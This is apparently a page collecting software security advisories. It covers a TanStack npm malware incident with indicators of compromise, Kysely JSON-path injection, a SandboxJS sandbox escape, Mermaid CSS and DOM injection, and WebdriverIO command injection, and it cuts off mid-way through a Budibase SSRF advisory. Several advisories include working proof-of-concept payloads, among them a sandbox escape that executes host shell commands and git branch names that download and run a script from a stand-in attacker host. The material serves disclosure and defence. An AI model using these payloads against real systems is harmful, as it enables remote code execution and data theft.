الوصف الكامل

## Summary On 2026-05-11, between approximately 19:20 and 19:26 UTC, 84 malicious versions across 42 `@tanstack/*` packages were published to the npm registry. The publishes were authenticated via the legitimate GitHub Actions OIDC trusted-publisher binding for `TanStack/router`, but the publish workflow itself was not modified. The attacker chained three known vulnerability classes — a `pull_request_target` "Pwn Request" misconfiguration, GitHub Actions cache poisoning across the fork↔base trust boundary, and runtime memory extraction of the OIDC token from the Actions runner process — to publish credential-stealing malware under a trusted identity. Each affected package received exactly two malicious versions, published a few minutes apart. ## Impact A user installing any affected version executes a payload (~2.3 MB obfuscated `router_init.js`) at install time that: - Harvests credentials from common locations: - AWS instance metadata (IMDS) and Secrets Manager - GCP metadata service - Kubernetes service-account tokens - HashiCorp Vault tokens - `~/.npmrc` (npm tokens) - GitHub tokens (env vars, `gh` CLI config, `.git-credentials`) - SSH private keys (`~/.ssh/`) - Exfiltrates harvested data over the Session/Oxen messenger file-upload network (`filev2.getsession.org`, `seed{1,2,3}.getsession.org`). This is end-to-end encrypted with no attacker-controlled C2, so blocking by IP or domain is the only network mitigation. - Enumerates packages that the victim maintains via `registry.npmjs.org/-/v1/search?text=maintainer:<user>` and republishes them with the same injection, propagating the compromise across npm. Any developer or CI environment that ran `npm install`, `pnpm install`, or `yarn install` against an affected version on 2026-05-11 should be considered compromised. All credentials accessible to the install process should be rotated immediately. Cloud audit logs should be reviewed for activity originating from the affected hosts during and after the install window. ## Detection Inspect the published manifest of any pinned `@tanstack/*` version. Malicious manifests contain this exact `optionalDependencies` entry: ```json "optionalDependencies": { "@tanstack/setup": "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c" } ``` To check a version without running install scripts: ```bash npm pack @tanstack/<name>@<version> # downloads tarball; does NOT execute lifecycle scripts tar -xzf *.tgz grep -A3 optionalDependencies package/package.json ls -la package/router_init.js # malicious payload, ~2.3 MB, present at package root ``` The payload file `router_init.js` is approximately 2.3 MB of obfuscated JavaScript. It is placed at the tarball root and is intentionally not declared in the package's `"files"` array, so it does not appear in the package's documented contents. ## Mechanism `@tanstack/setup` is not a real package on the npm registry. The `github:tanstack/router#79ac49ee...` specifier resolves to an orphan commit pushed to a fork in the `tanstack/router` GitHub fork network. GitHub serves commits across the entire fork network for git-URL dependencies, so the attacker did not require write access to `TanStack/router` itself — only the ability to fork and push to their own fork. When npm processes the optional dependency, it: 1. Fetches the orphan commit from the fork network. 2. Installs the commit's declared dependencies (which include a real `bun` binary). 3. Runs the commit's `prepare` lifecycle script: `bun run tanstack_runner.js && exit 1`. The trailing `exit 1` causes the optional install to fail, after which npm silently discards it — leaving no `node_modules` trace. 4. The `tanstack_runner.js` script in turn executes `router_init.js` from the host package's tarball. ## Patches Affected versions are being deprecated on npm with a `SECURITY:` notice. Where npm policy allows (no existing third-party dependents), affected versions are also being unpublished. The npm security team has been engaged to pull tarballs server-side for versions that cannot be unpublished. Clean follow-up releases are being prepared. Update to the patched version listed in the affected-products table for each package, then reinstall from a clean lockfile. ## Workarounds Until clean follow-up releases are available: - Pin every `@tanstack/*` dependency to a known-good version published before 2026-05-11 19:00 UTC. The last known-good version for most affected packages was published on 2026-03-15. - Delete `node_modules` and the lockfile, then reinstall to ensure no transitive dependency resolves to a malicious version. - Configure npm to skip lifecycle scripts on install (`npm config set ignore-scripts true`) as a temporary defense-in-depth measure. - For CI, audit any pipeline that ran `install` against `@tanstack/*` between 19:20 and 19:30 UTC on 2026-05-11. Treat the runner as compromised and rotate any secrets it had access to. ## Indicators of compromise | Indicator | Value | |---|---| | Malicious git ref | `github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c` | | Fictitious package name | `@tanstack/setup` | | Payload filename | `router_init.js` (~2.3 MB, package root, undeclared in `files`) | | Helper filename in orphan commit | `tanstack_runner.js` | | Exfiltration network | `filev2.getsession.org`, `seed1.getsession.org`, `seed2.getsession.org`, `seed3.getsession.org` | | Second-stage payload URLs | `https://litter.catbox.moe/h8nc9u.js`, `https://litter.catbox.moe/7rrc6l.mjs` | | Poisoned cache key | `Linux-pnpm-store-6f9233a50def742c09fde54f56553d6b449a535adf87d4083690539f49ae4da11` | | Publish window (UTC) | 2026-05-11 19:20 — 19:26 | | Publish mechanism | GitHub Actions OIDC trusted publisher (`oidc:db7d6f54-05d5-412b-8a10-e7a8398b303e`) | | Workflow runs | https://github.com/TanStack/router/actions/runs/25613093674 (attempt 4), https://github.com/TanStack/router/actions/runs/25691781302 | | Attacker GitHub accounts | `zblgg` (id 127806521), `voicproducoes` (id 269549300) | | Attacker fork (renamed to evade detection) | https://github.com/zblgg/configuration | ## Credits - The security researcher who initially disclosed the vulnerability publicly with detailed analysis at https://github.com/TanStack/router/issues/7383 ## References - Public incident tracking issue: https://github.com/TanStack/router/issues/7383 - Related research: - Adnan Khan, "The Monsters in Your Build Cache: GitHub Actions Cache Poisoning" (May 2024) - GitHub Security Lab, "Keeping your GitHub Actions and workflows secure: Preventing Pwn Requests" - StepSecurity, "tj-actions/changed-files action is compromised" (March 2025) — the malicious payload reuses this incident's runner-memory extraction technique verbatim

الإصدارات المتأثرة

1.166.12

نوع الثغرة

CWE-506 — Malicious Code

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

المراجع

الوصف الكامل

## Summary Kysely 0.28.12 added a `sanitizeStringLiteral()` call inside `DefaultQueryCompiler.visitJSONPathLeg` (commit `0a602bf`, PR #1727) to fix CVE-2026-32763 (`GHSA-wmrf-hv6w-mr66`). The fix only doubles single quotes (`'` → `''`); it does **not** escape JSON-path metacharacters (`.`, `[`, `]`, `*`, `**`, `?`). When attacker-controlled input flows into `eb.ref(col, '->$').key(input)` or `.at(input)` — including type-safe code where the JSON column is shaped like `Record<string, T>` so `K extends string` is the inferred type — every dot becomes a path-leg separator, letting an attacker traverse from the intended key into sibling and child fields the developer never meant to expose. The result is read access (and, in update statements, write access) to JSON sub-fields outside the intended scope across MySQL, PostgreSQL `->$`/`->>$`, and SQLite. * Project: Kysely — TypeScript SQL query builder (npm `kysely`); affects MySQL, PostgreSQL `->$`/`->>$`, and SQLite dialects. * Source reviewed: `kysely-org/kysely` @ `master` (`73192e4`, version `0.28.16`). * Deployed artefact validated: `kysely@0.28.16` from npm. * Affected file(s): * `src/query-compiler/default-query-compiler.ts` (lines 1611–1639, 1821–1823) * `src/query-builder/json-path-builder.ts` (lines 93–196) * `src/dialect/mysql/mysql-query-compiler.ts` (overrides `sanitizeStringLiteral` but inherits the same behaviour for path legs — escapes `\` and `'`, nothing else) * CWE: CWE-89 — Improper Neutralization of Special Elements used in an SQL Command, with CWE-915 / CWE-1284 (improper validation of specified quantity in input) flavours for the JSON-path sub-language. * OWASP 2021: A03:2021 — Injection. ## Vulnerable code `src/query-compiler/default-query-compiler.ts:1625-1639`: ```ts protected override visitJSONPathLeg(node: JSONPathLegNode): void { const isArrayLocation = node.type === 'ArrayLocation' this.append(isArrayLocation ? '[' : '.') // (1) this.append( typeof node.value === 'string' ? this.sanitizeStringLiteral(node.value) // (2) : String(node.value), ) if (isArrayLocation) { this.append(']') } } ``` `src/query-compiler/default-query-compiler.ts:1821-1823`: ```ts protected sanitizeStringLiteral(value: string): string { return value.replace(LIT_WRAP_REGEX, "''") // (3) } ``` with `LIT_WRAP_REGEX = /'/g`. `src/query-builder/json-path-builder.ts:151-167`: ```ts key< K extends any[] extends O ? never : O extends object ? keyof NonNullable<O> & string : never, O2 = undefined extends O ? null | NonNullable<NonNullable<O>[K]> : null extends O ? null | NonNullable<NonNullable<O>[K]> : // when the object has non-specific keys, e.g. Record<string, T>, should infer `T | null`! string extends keyof NonNullable<O> ? null | NonNullable<NonNullable<O>[K]> : NonNullable<O>[K], >(key: K): TraversedJSONPathBuilder<S, O2> { return this.#createBuilderWithPathLeg('Member', key) // (4) } ``` `src/query-builder/json-path-builder.ts:169-196`: ```ts #createBuilderWithPathLeg( legType: JSONPathLegType, value: string | number, // (5) ): TraversedJSONPathBuilder<any, any> { // ... return new TraversedJSONPathBuilder( JSONPathNode.cloneWithLeg( this.#node, JSONPathLegNode.create(legType, value), // (6) ), ) } ``` At (1) the compiler emits the path-leg separator — `.` for member access or `[` for array index. At (2) the user-supplied string is run through `sanitizeStringLiteral`, which at (3) only doubles single quotes (`'`). Dots, brackets, asterisks, double-asterisks and question marks — every reserved character of the SQL/JSON path mini-language — pass through unmodified. At (4) `.key(K)` types `K` as `keyof NonNullable<O> & string`. When the JSON column is typed as `Record<string, T>` (a common shape for free-form metadata blobs) the inferred `K` is just `string`, so attacker-controlled input is **type-safe** and does not need a `Kysely<any>` escape hatch — this finding is *broader* than `GHSA-wmrf-hv6w-mr66` (CVE-2026-32763), which only covered the `Kysely<any>` case. At (5)/(6) the runtime accepts any `string | number` regardless of `legType`, so a string sent into `.at(...)` (`'last'`/`'#-N'` per the public type signature) also reaches the same emitter and can carry `]` to break out of the bracket. The fix at `0a602bf` only addressed the single-quote → string-literal escape. The JSON-path metacharacter set was overlooked. `MysqlQueryCompiler.sanitizeStringLiteral` (`src/dialect/mysql/mysql-query-compiler.ts:47-51`) overrides the helper to also escape backslashes — but again, it does nothing for `. [ ] * ** ?`. ## Reproduction (validated locally) Environment: `kysely@0.28.16` + `better-sqlite3@12.x`, Node 22, on macOS. The PoC harness lives in `/Users/admin/joplin_research/kysely-poc/`. ### Step 1 — Compiled-SQL evidence across all three dialects `/Users/admin/joplin_research/kysely-poc/poc.mjs` (no DB, just `.compile()`): ```bash $ node poc.mjs ===== MySQL ===== --- baseline: .key("nick") --- SQL: select `profile`->'$.nick' as `out` from `person` --- INJECTION via .key(ATTACKER) -- "nick.secret_field" --- SQL: select `profile`->'$.nick.secret_field' as `out` from `person` --- INJECTION via .key("*") -- wildcard reaches all keys --- SQL: select `profile`->'$.*' as `out` from `person` --- INJECTION via .at(ATTACKER3) -- bracket escape --- SQL: select `profile`->'$[].secret]' as `out` from `person` ===== PostgreSQL (->$ uses jsonpath, MySQL-like) ===== --- baseline: .key("nick") --- SQL: select "profile"->'$.nick' as "out" from "person" --- INJECTION via .key(ATTACKER) --- SQL: select "profile"->'$.nick.secret_field' as "out" from "person" ===== SQLite ===== --- baseline: .key("nick") --- SQL: select "profile"->>'$.nick' as "value" from "person" --- INJECTION via .key(ATTACKER) --- SQL: select "profile"->>'$.nick.secret_field' as "out" from "person" --- INJECTION via .key("*") --- SQL: select "profile"->>'$.*' as "out" from "person" ``` The compiled SQL clearly shows the dot inside the user-supplied "key" being interpreted by the database as a path separator: `'$.nick'` (one leg) becomes `'$.nick.secret_field'` (two legs). MySQL additionally accepts `*` as a wildcard reaching every member at the current level. ### Step 2 — End-to-end data disclosure on a real database `/Users/admin/joplin_research/kysely-poc/sqlite-runtime.mjs` simulates a typical handler that reads one top-level field of the caller's profile: ```js async function fetchProfileField(userInput) { return db.selectFrom('me') .select(eb => eb.ref('profile', '->>$').key(userInput).as('value')) .where('id', '=', 1) .execute() } ``` The `me.profile` JSON column for user 1 is: ```json { "nick": "alice", "tagline": "hi", "internal": { "ssn": "111-11-1111", "token": "tok_abcdef", "admin": true } } ``` The developer's intent: only top-level keys (`nick`, `tagline`) are ever requested. `internal` is private bookkeeping. ```bash $ node sqlite-runtime.mjs ===== Legitimate request ===== userInput = "nick" compiled SQL: select "profile"->>'$.nick' as "value" from "me" where "id" = ? result: [ { value: 'alice' } ] ===== Injection: dot lets attacker reach nested "internal" object ===== userInput = "internal.ssn" compiled SQL: select "profile"->>'$.internal.ssn' as "value" from "me" where "id" = ? result: [ { value: '111-11-1111' } ] userInput = "internal.token" compiled SQL: select "profile"->>'$.internal.token' as "value" from "me" where "id" = ? result: [ { value: 'tok_abcdef' } ] userInput = "internal.admin" compiled SQL: select "profile"->>'$.internal.admin' as "value" from "me" where "id" = ? result: [ { value: 1 } ] ``` Expected vs. actual: the application invariant was "the user can only read top-level keys of their profile". The output violates that invariant — `internal.ssn`, `internal.token`, and `internal.admin` are returned even though `internal` was never meant to be addressable through this endpoint. The same pattern is exploitable on MySQL (where `*` and `**` wildcards make it strictly worse — a single `*` enumerates every sibling at the current level in one row) and on PostgreSQL when using the `->$`/`->>$` operators (which target MySQL-style JSON-path strings on PG ≥ 17 / via `jsonb_path_query`). ## Impact * **Authorization bypass on JSON sub-fields.** Any kysely-built query whose JSON-path key/index argument is partially or fully attacker-controlled — even in fully type-safe code where the column type is `Record<string, T>` — leaks data the developer believed was scoped behind the explicitly-listed key. SSNs, tokens, admin flags, internal IDs, anything stored as a nested member of the same JSON document is reachable. * **Wildcard reads on MySQL / PostgreSQL `->$`.** `key('*')` compiles to `'$.*'`, returning the array of every value at the current depth in one round-trip. `key('**')` recurses across the whole document. The fix does not strip either token. * **Write access in update statements.** Kysely uses the same path compiler for `update().set(eb => eb.ref(col, '->$').key(input), value)`-style writes (and `jsonb_set` helpers). An attacker who can drive both the path and the value can therefore write into nested fields they should not be able to set — for example flipping an `admin` flag or rewriting a nested role. * **Bypasses the recently-fixed precedent.** The maintainers shipped commit `0a602bf` (PR #1727) specifically to harden this surface. That fix removed the `'` (quote) primitive but left every JSON-path metacharacter alone, so the surface is still open against any caller that *thought* it was now safe. * **Practical bounding.** The attacker needs a code path where a request-derived string lands in `.key(...)` or `.at(...)`. This is a recognised pattern (filter-by-field, dynamic `select` for admin dashboards, Strapi-style JSON-blob columns); it is not a default kysely behaviour but is plausibly common. The vulnerable path is also exercised any time a developer writes `db as Kysely<any>` (covered by the older `GHSA-wmrf-hv6w-mr66` advisory) — but unlike that advisory, the bug here triggers in fully-typed code on `Record<string, T>` columns. ## Suggested fix Treat path legs as a structured emission, not a string-literal escape. The narrowest safe patch is a dedicated `sanitizeJSONPathLeg` that only emits a known-good character set per leg type and rejects everything else, since JSON-path quoting differs by dialect (MySQL allows `"…"`-quoted member names; SQLite is more permissive but still has a grammar; PostgreSQL `jsonpath` is strict). ```ts // src/query-compiler/default-query-compiler.ts const JSON_PATH_MEMBER_OK = /^[A-Za-z_$][A-Za-z0-9_$]*$/ protected override visitJSONPathLeg(node: JSONPathLegNode): void { if (node.type === 'ArrayLocation') { this.append('[') if (typeof node.value === 'number') { this.append(String(node.value | 0)) // int-coerce } else if (node.value === 'last' || /^#-\d+$/.test(node.value)) { this.append(node.value) // documented dialect tokens } else { throw new Error(`invalid JSON array index: ${node.value}`) } this.append(']') return } // Member this.append('.') if (typeof node.value !== 'string' || !JSON_PATH_MEMBER_OK.test(node.value)) { // Per-dialect quoted-member escape would go here; default = reject. throw new Error(`invalid JSON path member: ${JSON.stringify(node.value)}`) } this.append(node.value) } ``` For dialect-specific behaviour (MySQL `"…"`-quoted members, SQLite bracket-quoted), each dialect compiler should override the helper and apply the appropriate quoting + double-the-quote rule, the same way `sanitizeIdentifier` already does. Consider also: parameterise JSON paths whenever the dialect supports it (PostgreSQL `jsonb_path_query($1, $2)`, MySQL `JSON_EXTRACT(?, ?)`), so attacker-controlled keys are bound, not concatenated. Add a regression test to `test/node/src/json-traversal.test.ts` asserting that `eb.ref('c','->$').key('a.b').compile().sql` is **either** rejected, **or** emits MySQL `'$."a.b"'` / SQLite `'$.["a.b"]'` (quoted-member form), and explicitly differs from `key('a').key('b')`. A backstop hardening: tighten the `.at()` runtime to accept only `number | 'last' | '#-${digits}'` (matching the type signature), and tighten `.key()` to only accept strings that match `keyof O` at runtime when `O` is statically known.

الإصدارات المتأثرة

All versions < 0.28.17

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

المراجع

الوصف الكامل

### Summary Sandbox-defined functions expose `Function.caller`, allowing sandboxed code to recover the internal `LispType.Call` runtime callback. That callback can then be invoked with attacker-controlled fake context and obj values to extract blocked host statics, recover the real host Function constructor, and execute arbitrary host JavaScript. ### Details In [executorUtils.ts](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/executorUtils.ts#L239-L282) `createFunction()` constructs normal host JS functions, and because these are ordinary host functions, sandbox code can observe: ```js function f(){ return f.caller } ``` That leaks the host-side callback that invoked the sandbox function. This leaked callback is the internal `LispType.Call` op, which is registered in [call.ts](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L16-L17). The leaked callback accepts a **params** object from the attacker and uses its fields without any authentication checks. if you looked at those branches [call.ts:47](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L47-L55), [call.ts:70](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L70), [call.ts:149](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L149-L153). This means the attacker controls `obj.context`, `obj.prop`, `obj.get`, `context.evals.get` and `a`. This can lead to direct invocation of an internal primitive with forged operands ### PoC ```js const sandb = require('@nyariv/sandboxjs').default; const sand = new sandb(); const payload = ` const callOp = (function fn() { return fn.caller; })(); function makeContext(capture = () => {}) { return { ctx: { options: 0 }, evals: { get: capture } }; } function leakStatic(obj, prop) { let leaked; callOp({ done() {}, a() {}, b: [], obj: { context: obj, prop, get() {} }, context: makeContext((fn) => (leaked = fn, () => 1)) }); return leaked; } function callDirect(fn, args) { let value; callOp({ done(_, result) { value = result; }, a() {}, b: args, obj: fn, context: makeContext() }); return value; } callDirect(leakStatic(Object, 'defineProperty'), [ leakStatic, 'call', callDirect(leakStatic(Object, 'getOwnPropertyDescriptor'), [ callDirect(leakStatic(Object, 'getPrototypeOf'), [() => 0]), 'constructor' ]) ]); let hostFn; callOp({ done(_, result) { hostFn = result; }, a: leakStatic, b: [], obj: { context: 'return process.getBuiltinModule("child_process").execSync("whoami").toString()', get() {} }, context: makeContext() }); return hostFn(); `; console.log(sand.compile(payload)().run()); ``` ### Impact _Sandbox escape leads to RCE_

الإصدارات المتأثرة

All versions < 0.9.6

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

المراجع

الوصف الكامل

### Impact Mermaid's default configuration allows injecting CSS that applies outside of the Mermaid diagram via the `fontFamily`, `themeCSS`, and `altFontFamily` configuration options. Live demo: [mermaid.live](https://mermaid.live/edit#pako:eNpNjktLxDAUhf9KvFBR6JS-60QQfODKlUvJ5k6TtsEmKTHFGUP-u-mI6Nmdy3fOPR56wwVQSBIvtXSUeAaD0e4ZlZxPDChhcLxFfwiEauOuLq_9Afv30ZpVczpaITS5kGox1qF2gfSeBwYhJAnThAyz-ewntI68vG5-0z3Z7e7IA9OQwmglB-rsKlJQwircLPgNZeAmocTPAi4GXGfHgOkQYwvqN2PUbzJuGSegA84f0a0LRyeeJI4W_xChubCPcbQD2pwbgHo4Aq2aKmvbqq3zoiu7pizqFE6RybN9VFfFY1HWXRVS-Dr_zLObrt7_V_gGGXZlGg) Example code: ``` %%{init: {"fontFamily": "x;a{b} :not(&){background:green !important} c{d}"}}%% flowchart LR A --> B ``` The injected CSS exploits stylis's `&` (scope reference) handling. `:not(&)` escapes the `#mermaid-xxx` automatic scoping, applying styles to all page elements. Global at-rules (`@font-face`, `@keyframes`, `@counter-style`) are also injectable as stylis hoists them to top level. This allows page defacement and DOM attribute exfiltration via CSS `:has()` selectors. ### Patches - [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [64769738d5b59211e1decb471ffbaca8afec51aa](https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa)) - [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [a9d9f0d8eb790349121508688cd338253fd80d76](https://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76)) ### Workarounds If you can't upgrade mermaid, you can set the [`secure`](https://mermaid.js.org/config/schema-docs/config.html#secure) config value in the mermaid config to avoid allowing diagrams to modify `fontFamily`, `themeCSS`, `altFontFamily`, and `themeVariables`. Setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will also prevent this. ### Credits Reported by @zsxsoft on behalf of @KeenSecurityLab

الإصدارات المتأثرة

11.0.0-alpha.1 → 11.15.0

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L

المراجع

الوصف الكامل

### Impact Mermaid v11.14.0 and earlier are vulnerable to a denial-of-service attack when rendering gantt charts, if they use the [`excludes` attribute](https://mermaid.js.org/syntax/gantt.html?#excludes) to exclude all dates. Example: ``` gantt excludes monday,tuesday,wednesday,thursday,friday,saturday,sunday DoS :2025-01-01, 1d ``` `mermaid.parse` is unaffected, unless you then call the `ganttDb.getTasks()` (which is called when rendering a diagram). ### Patches This has been patched in: - [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [faafb5d49106dd32c367f3882505f2dd625aa30e](https://github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e)) - [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [a59ea56174712ee5430dfd5bc877cb5151f501a6](https://github.com/mermaid-js/mermaid/commit/a59ea56174712ee5430dfd5bc877cb5151f501a6)) ### Workarounds There are no workarounds available without updating to a newer version of mermaid.

الإصدارات المتأثرة

11.0.0-alpha.1 → 11.15.0

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L

المراجع

الوصف الكامل

### Impact Under the default configuration, Mermaid state diagram's `classDef` allow DOM injection that escapes the SVG, although `<script>` tags are removed, preventing XSS. #### Proof-of-concept ``` stateDiagram-v2 classDef xss fill:red</style></svg><style>*{x:x;y:y;overflow:visible!important;contain:none!important;transform:none!important;filter:none!important;clip-path:none!important}</style><div style="x:x;y:y;color:red;font:5em/1 monospace;display:grid;place-items:center;z-index:2147483647;width:100vw;height:100vh;position:fixed;top:0;left:0;background:black">HACKED</div><svg><style>a:b [*] --> A:::xss ``` ### Patches - [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [37ff937f1da2e19f882fd1db01235db4d01f4056](https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056)) - [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3)) ### Workarounds If you can not update to a patched version, setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will prevent this, by rendering the mermaid diagram in a sandboxed `<iframe>`. ### Credits Thanks to @zsxsoft from @KeenSecurityLab for reporting this vulnerability.

الإصدارات المتأثرة

11.0.0-alpha.1 → 11.15.0

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L

المراجع

الوصف الكامل

### Details The state diagram and any other diagram type that routes user-controlled style strings through createCssStyles parser for Mermaid v11.14.0 and earlier captures `classDef` values with an unrestricted regex: ```jison // packages/mermaid/src/diagrams/state/parser/stateDiagram.jison:83 <CLASSDEFID>[^\n]* { this.popState(); return 'CLASSDEF_STYLEOPTS' } ``` The value passes unsanitized through `addStyleClass()` -> `createCssStyles()` -> `style.innerHTML` (mermaidAPI.ts:418). A `}` in the value closes the generated CSS selector, and everything after becomes a new CSS rule on the page. ### PoC ``` stateDiagram-v2 classDef x }*{ background-image: url("http://media.giphy.com/media/SggILpMXO7Xt6/giphy.gif")} ``` Live demo: <https://mermaid.live/edit#pako:eNpFjzFvgzAQhf-KdVNbEcBgMHhtlkqtOnSJKi8ONsYKBmRMlRTx3-skanvTfbp7996t0IxSAYPZC6_2Rmgn7O4rQ00v5nmvWnRG29OKjqI5aTcug9wZK7RiaHH9A4fO-4kliVXSiFibqbvEzWjvnHxo_fI6vR3e6cGXyX2qTcvhcYMItDMSmHeLisAqZ8UVYeUDQhx8p6ziwEIrhTtx4MNVM4nhcxztrywE0h2wVvRzoGWS_z_8rahBKvcckntgmN5OAFvhDIzUNCZZQXCR5nVaZkUEF2BVFpOcEkoxxhUuyRbB980yjStapKHqoKFlhvPtB7BFZEU> ### Patches This has been patched in: - [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [e9b0f34d8d82a6260077764ee45e1d7d90957a0f](https://github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f)) - [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [8fead23c59166b7bab6a39eac81acebee2859102](https://github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102)) ### Workarounds Setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will prevent this, by rendering the mermaid diagram in a sandboxed `<iframe>`. ### Impact Enables page defacement, user tracking via `url()` callbacks, and DOM attribute exfiltration via CSS `:has()` selectors.

الإصدارات المتأثرة

11.0.0-alpha.1 → 11.15.0

CVSS Vector

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L

المراجع

الوصف الكامل

### Summary A command injection vulnerability exists in `@wdio/browserstack-service` that allows remote code execution (RCE) when processing git branch names in test orchestration. An attacker can exploit this by providing a malicious git repository with a branch name containing shell command injection payloads. ### Details _Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._ ### Vulnerable Code **File**: https://github.com/webdriverio/webdriverio/blob/ea0e3e00288abced4c739ff9e46c46977b7cdbd2/packages/wdio-browserstack-service/src/testorchestration/helpers.ts#L204 ### Root Cause User-controlled git branch names are directly interpolated into `execSync()` calls without sanitization. Git allows branch names to contain special characters ,that can be used for command injection. Git allows to create these branches. ``` git checkout -b "main;touch\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED" git checkout -b "main;rm\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED" git checkout -b "main;curl\${IFS}evil.com/evil.sh\${IFS}>/tmp/evil.sh;bash\${IFS}/tmp/evil.sh;echo\${IFS}PWNED" ``` ### Attack Vector 1. Attacker creates a malicious git repository with a branch name containing command injection payload 2. Attacker configures WebdriverIO to use this repository via `testOrchestrationOptions.runSmartSelection.source`. if `source` is not provided it takes current directory as `source`. 3. When `getGitMetadataForAISelection()` executes, it extracts the malicious branch name 4. Branch name is interpolated into shell commands without sanitization 5. Shell interprets special characters and executes attacker's commands ### PoC ### Step 1: Create Malicious Repository Branch ``` git checkout -b "main;touch\${IFS}/tmp/pwned.txt;echo\${IFS}PWNED" ``` ### Step 2: Configure WebdriverIO ```javascript // wdio.conf.js export const config = { services: [ ['browserstack', { user: process.env.BROWSERSTACK_USERNAME, key: process.env.BROWSERSTACK_ACCESS_KEY, testOrchestrationOptions: { runSmartSelection: { enabled: true, source: ['/tmp/malicious-repo'] // ⚠️ Points to malicious repo, without "source" field, it runs in the current directory. } } }] ], // ... rest of config } ``` ### Step 3: Run Tests ```bash npm run wdio ``` ### Step 4: Verify RCE ```bash # Check if file was created (proof of RCE) ls -la /tmp/pwned.txt ``` ### Impact - **Remote Code Execution** on CI/CD servers or developer machines - **Information Disclosure** (environment variables, secrets, credentials) - **Data Exfiltration** (source code, SSH keys, configuration files) - **System Compromise** (backdoor installation, lateral movement) - **Supply Chain Attack** (modify build artifacts)

الإصدارات المتأثرة

All versions < 9.24.0

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

المراجع

الوصف الكامل

### Impact It was found that the fix addressing [CVE-2026-44575](https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f) did not apply to `middleware.ts` with Turbopack. Refer to [CVE-2026-44575](https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f) for further details. ### References - [CVE CVE-2026-44575](https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f)

الإصدارات المتأثرة

15.2.0 → 15.5.18

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

المراجع

الوصف الكامل

## 1. Summary | Field | Value | |-------|-------| | **Title** | SSRF via trivial `.tar.gz` substring bypass in Plugin URL upload | | **Product** | Budibase (Self-Hosted) | | **Version** | ≤ 3.34.11 (latest stable as of 2026-03-30) | | **Component** | `packages/server/src/api/controllers/plugin/url.ts` | | **Vulnerability Type** | CWE-918: Server-Side Request Forgery (SSRF), CWE-184: Incomplete List of Disallowed Inputs | | **Severity** | High (chained) / Medium (standalone) | | **CVSS 3.1 Score (chained)** | 7.7 — `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N` | | **CVSS 3.1 Score (standalone)** | 5.4 — `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N` | | **Attack Vector** | Network | | **Privileges Required** | Low (Global Builder role) | | **User Interaction** | None | | **Affected Deployments** | All Budibase instances with plugin loading enabled (default) | --- ## 2. Description The Plugin URL upload endpoint (`POST /api/plugin`) validates the submitted URL with a single substring check: `url.includes(".tar.gz")`. Any URL containing `.tar.gz` anywhere in the string — in the path, query string, or fragment — passes this check. The URL then proceeds directly to `fetchWithBlacklist()` with no further validation of host, scheme, or path. Standalone, this vulnerability is blocked by Budibase's default SSRF blacklist, which covers private IP 